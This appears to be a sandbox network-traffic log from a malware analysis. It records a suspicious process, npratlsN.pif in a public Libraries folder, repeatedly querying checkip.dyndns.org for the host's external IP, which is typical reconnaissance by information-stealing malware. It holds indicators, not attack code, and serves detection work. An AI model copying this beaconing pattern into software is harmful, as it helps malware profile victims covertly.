Jan 14, 2025 08:08:25.590271950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:26.410264969 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	52745	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:27.937289953 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:28.842770100 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	52747	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:29.483717918 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:30.320014954 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	52749	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:30.953635931 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:31.802824020 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	52751	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:32.490906000 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:33.319438934 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	52753	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:33.563077927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:34.378317118 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:34.382025003 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:34.666214943 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:35.722327948 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:36.007688999 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52754	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:33.957174063 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:34.780626059 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	52757	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:35.401293039 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:36.226084948 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	52760	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:36.762757063 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:37.578485012 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	52763	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:38.207943916 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:39.049273968 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	52765	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:39.857902050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:40.663194895 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	52767	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:41.669322968 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:42.570863008 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	52768	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:42.565793991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:43.489461899 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:43.494108915 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:43.837888956 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:45.116780043 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:45.444053888 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	52770	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:43.375812054 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:44.360202074 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	52773	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:45.067121983 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:45.897196054 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	52777	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:46.094517946 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:46.930382967 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	52778	132.226.8.169	80	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:46.491415977 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:47.297735929 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	52781	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:47.558037996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:48.395697117 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	52784	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:49.011588097 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:49.845804930 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	52786	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:50.446115017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:51.267903090 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	52788	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:51.867625952 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
